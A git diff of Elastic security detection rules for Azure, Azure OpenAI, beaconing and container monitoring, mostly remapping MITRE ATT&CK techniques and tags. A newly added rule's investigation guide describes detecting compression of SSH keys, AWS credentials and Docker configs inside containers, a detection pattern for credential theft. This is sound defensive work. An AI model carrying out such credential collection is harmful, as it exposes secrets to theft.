framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.005" +name = "Device Registration" +reference = "https://attack.mitre.org/techniques/T1098/005/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.005" -name = "Device Registration" -reference = "https://attack.mitre.org/techniques/T1098/005/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.user_principal_name", diff --git a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml index 49921ba6a96..6cf84594742 100644 --- a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml +++ b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -67,7 +67,7 @@ references = ["https://docs.microsoft.com/en-us/azure/event-hubs/authorize-acces risk_score = 47 rule_id = "b6dce542-2b75-4ffb-b7d6-38787298ba9d" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Log Auditing", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Log Auditing", "Tactic: Persistence", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -78,36 +78,30 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" [[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" +id = "T1552.005" +name = "Cloud Instance Metadata API" +reference = "https://attack.mitre.org/techniques/T1552/005/" + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml b/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml index aab5a627660..fa59f5be650 100644 --- a/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml +++ b/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/14" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -52,7 +52,16 @@ references = ["https://dirkjanm.io/persisting-with-federated-credentials-entra-a risk_score = 47 rule_id = "42c97e6e-60c3-11f0-832a-f661ea17fbcd" severity = "medium" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Graph", "Data Source: Microsoft Graph Activity Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Microsoft Graph", + "Data Source: Microsoft Graph Activity Logs", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Persistence", +] timestamp_override = "event.ingested" type = "new_terms" @@ -66,29 +75,22 @@ event.dataset: azure.graphactivitylogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.graphactivitylogs.properties.user_principal_object_id"] diff --git a/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml b/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml index 3b789ded337..af9bc41d8c9 100644 --- a/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml +++ b/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -81,7 +81,6 @@ sequence with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" @@ -92,6 +91,16 @@ id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml b/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml index bfe260a8cfb..de9b0f23509 100644 --- a/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml +++ b/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/15" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/15" [rule] author = ["Elastic"] @@ -65,7 +65,14 @@ references = [ risk_score = 73 rule_id = "1a1046f4-9257-11f0-9a42-f661ea17fbce" severity = "high" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Azure Activity Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -86,34 +93,16 @@ event.dataset: azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0004" diff --git a/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml b/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml index cff07282bae..0f07d5c9080 100644 --- a/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml +++ b/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/22" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic", "Austin Songer"] @@ -66,7 +66,16 @@ references = [ risk_score = 73 rule_id = "8d9c4128-372a-11f0-9d8f-f661ea17fbcd" severity = "high" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Audit Logs", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -81,39 +90,22 @@ event.dataset: azure.auditlogs [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.auditlogs.properties.initiated_by.user.userPrincipalName"] diff --git a/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml b/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml index 45a2e0961ab..eae2f416a42 100644 --- a/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml +++ b/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/18" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Austin Songer"] @@ -62,7 +62,13 @@ references = [ risk_score = 21 rule_id = "1c966416-60c1-436b-bfd0-e002fddbfd89" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -76,36 +82,30 @@ event.outcome:(Success or success) [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1098.006" -name = "Additional Container Cluster Roles" -reference = "https://attack.mitre.org/techniques/T1098/006/" +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.006" -name = "Additional Container Cluster Roles" -reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml b/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml index 0af5fcf3987..d20e1c44577 100644 --- a/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml +++ b/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/03" integration = ["azure"] maturity = "development" -updated_date = "2026/03/23" +updated_date = "2026/03/03" [rule] author = ["Elastic"] @@ -86,3 +86,20 @@ event.dataset: azure.auditlogs ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1584" +name = "Compromise Infrastructure" +reference = "https://attack.mitre.org/techniques/T1584/" +[[rule.threat.technique.subtechnique]] +id = "T1584.001" +name = "Domains" +reference = "https://attack.mitre.org/techniques/T1584/001/" + + + +[rule.threat.tactic] +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" diff --git a/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml b/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml index 4934540a281..46cd5e6b95a 100644 --- a/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml +++ b/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/25" integration = ["azure_openai"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] @@ -65,7 +65,14 @@ For more information on streaming events, see the Azure OpenAI documentation: https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/stream-monitoring-data-event-hubs """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Impact", "Data Source: Azure OpenAI", "Data Source: Azure Event Hubs", "Use Case: Denial of Service", "Mitre Atlas: T0029", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: Azure OpenAI", + "Data Source: Azure Event Hubs", + "Use Case: Denial of Service", + "Mitre Atlas: T0029", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -91,33 +98,3 @@ from logs-azure_openai.logs-* | sort Esql.event_count desc ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1499" -name = "Endpoint Denial of Service" -reference = "https://attack.mitre.org/techniques/T1499/" - -[[rule.threat.technique.subtechnique]] -id = "T1499.003" -name = "Application Exhaustion Flood" -reference = "https://attack.mitre.org/techniques/T1499/003/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0059" -name = "Erode Dataset Integrity" -reference = "https://atlas.mitre.org/techniques/AML.T0059/" - -[rule.threat.tactic] -id = "AML.TA0011" -name = "Impact" -reference = "https://atlas.mitre.org/tactics/AML.TA0011/" diff --git a/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml b/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml index f626db07f8c..80c55337e22 100644 --- a/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml +++ b/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/25" integration = ["azure_openai"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] @@ -61,7 +61,13 @@ For more information on streaming events, see the Azure OpenAI documentation: https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/stream-monitoring-data-event-hubs """ severity = "low" -tags = ["Domain: LLM", "Tactic: Impact", "Data Source: Azure OpenAI", "Data Source: Azure Event Hubs", "Use Case: Insecure Output Handling", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: Azure OpenAI", + "Data Source: Azure Event Hubs", + "Use Case: Insecure Output Handling", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -86,15 +92,3 @@ from logs-azure_openai.logs-* Esql.event_count desc ''' -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0048" -name = "External Harms" -reference = "https://atlas.mitre.org/techniques/AML.T0048/" - -[rule.threat.tactic] -id = "AML.TA0011" -name = "Impact" -reference = "https://atlas.mitre.org/tactics/AML.TA0011/" diff --git a/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml b/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml index 0ed1e394199..d5cb5f71268 100644 --- a/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml +++ b/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/25" integration = ["azure_openai"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] @@ -62,7 +62,14 @@ streaming events, see the Azure OpenAI documentation: https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/stream-monitoring-data-event-hubs """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Credential Access", "Tactic: Exfiltration", "Tactic: AI Model Access", "Data Source: Azure OpenAI", "Data Source: Azure Event Hubs", "Use Case: Model Theft", "Mitre Atlas: T0044", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: Azure OpenAI", + "Data Source: Azure Event Hubs", + "Use Case: Model Theft", + "Mitre Atlas: T0044", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -91,54 +98,3 @@ from logs-azure_openai.logs-* Esql.event_count desc ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0040" -name = "AI Model Inference API Access" -reference = "https://atlas.mitre.org/techniques/AML.T0040/" - -[rule.threat.tactic] -id = "AML.TA0000" -name = "AI Model Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0000/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0024" -name = "Exfiltration via AI Inference API" -reference = "https://atlas.mitre.org/techniques/AML.T0024/" - -[rule.threat.tactic] -id = "AML.TA0010" -name = "Exfiltration" -reference = "https://atlas.mitre.org/tactics/AML.TA0010/" diff --git a/rules/integrations/beaconing/command_and_control_beaconing.toml b/rules/integrations/beaconing/command_and_control_beaconing.toml index dc81f134f13..f89fe47c8c3 100644 --- a/rules/integrations/beaconing/command_and_control_beaconing.toml +++ b/rules/integrations/beaconing/command_and_control_beaconing.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["beaconing", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -95,13 +95,19 @@ Statistical models analyze network traffic patterns to identify anomalies indica [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml b/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml index 62075e640fe..0fe0d4d7320 100644 --- a/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml +++ b/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["beaconing", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -90,13 +90,19 @@ Statistical models analyze network traffic patterns to identify anomalies indica [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml b/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml index 9b376e4d6e1..98c2b0a4e53 100644 --- a/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml +++ b/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/01/27" [rule] author = ["Elastic"] @@ -72,9 +72,9 @@ process.interactive == true and container.id like "?*" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml b/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml index 1550a8b19f4..5d448150ea9 100644 --- a/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml +++ b/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/10" [rule] author = ["Elastic"] @@ -65,7 +65,15 @@ references = [ risk_score = 47 rule_id = "a8b08d2d-6dfe-453f-87d1-11d5fc3ec746" severity = "medium" -tags = ["Tactic: Command and Control", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Execution", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -87,12 +95,35 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" + + [[rule.threat.technique]] + name = "Application Layer Protocol" + id = "T1071" + reference = "https://attack.mitre.org/techniques/T1071/" + + [[rule.threat.technique.subtechnique]] + name = "Web Protocols" + id = "T1071.001" + reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + id = "T1059" + name = "Command and Scripting Interpreter" + reference = "https://attack.mitre.org/techniques/T1059/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique.subtechnique]] + name = "Unix Shell" + id = "T1059.004" + reference = "https://attack.mitre.org/techniques/T1059/004/" diff --git a/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml b/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml index c2d8e83ee8d..0e1b024eb19 100644 --- a/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml +++ b/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/10" [rule] author = ["Elastic"] @@ -96,11 +96,6 @@ process where event.type == "start" and event.action == "exec" and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml b/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml new file mode 100644 index 00000000000..67fbebdda38 --- /dev/null +++ b/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml @@ -0,0 +1,141 @@ +[metadata] +creation_date = "2023/05/12" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/01/15" + +[rule] +author = ["Elastic"] +description = """ +Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials +and system configurations inside a container. +""" +from = "now-6m" +index = ["logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Sensitive File Compression Detected via Defend for Containers" +note = """## Setup + +## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Sensitive File Compression Detected via Defend for Containers + +Containers are lightweight, portable environments used to run applications consistently across different systems. Adversaries may exploit compression utilities within containers to gather and exfiltrate sensitive files, such as credentials and configuration files. The detection rule identifies suspicious compression activities by monitoring for specific utilities and file paths, flagging potential unauthorized data collection attempts. + +### Possible investigation steps + +- Review the process details to confirm the use of compression utilities such as zip, tar, gzip, hdiutil, or 7z within the container environment, focusing on the process.name and process.args fields. +- Examine the specific file paths listed in the process.args to determine if they include sensitive files like SSH keys, AWS credentials, or Docker configurations, which could indicate unauthorized data collection. +- Identify the container.id associated with the alert to gather more context about the container's purpose, owner, and any recent changes or deployments that might explain the activity. +- Check the event.type field for "start" to verify the timing of the process initiation and correlate it with any known legitimate activities or scheduled tasks within the container. +- Investigate the user or service account under which the process was executed to assess whether it has the necessary permissions and if the activity aligns with expected behavior for that account. +- Look for any related alerts or logs that might indicate a broader pattern of suspicious activity within the same container or across other containers in the environment. + +### False positive analysis + +- Routine backup operations may trigger the rule if they involve compressing sensitive files for storage. To handle this, identify and exclude backup processes or scripts that are known and trusted. +- Automated configuration management tools might compress configuration files as part of their normal operation. Exclude these tools by specifying their process names or paths in the exception list. +- Developers or system administrators might compress sensitive files during legitimate troubleshooting or maintenance activities. Establish a process to log and review these activities, and exclude them if they are verified as non-threatening. +- Continuous integration and deployment pipelines could involve compressing configuration files for deployment purposes. Identify these pipelines and exclude their associated processes to prevent false positives. +- Security tools that perform regular audits or scans might compress files for analysis. Ensure these tools are recognized and excluded from triggering the rule. + +### Response and remediation + +- Immediately isolate the affected container to prevent further data exfiltration or unauthorized access. This can be done by stopping the container or disconnecting it from the network. +- Conduct a thorough review of the compressed files and their contents to assess the extent of sensitive data exposure. Focus on the specific file paths identified in the alert. +- Change credentials and keys that may have been compromised, including SSH keys, AWS credentials, and Docker configurations. Ensure that new credentials are distributed securely. +- Review and update access controls and permissions for sensitive files within containers to minimize exposure. Ensure that only necessary processes and users have access to these files. +- Implement monitoring and alerting for similar compression activities in other containers to detect potential threats early. Use the identified process names and arguments as indicators. +- Escalate the incident to the security operations team for further investigation and to determine if additional systems or data have been affected. +- Conduct a post-incident review to identify gaps in security controls and update container security policies to prevent recurrence.""" +risk_score = 47 +rule_id = "475b42f0-61fb-4ef0-8a85-597458bfb0a1" 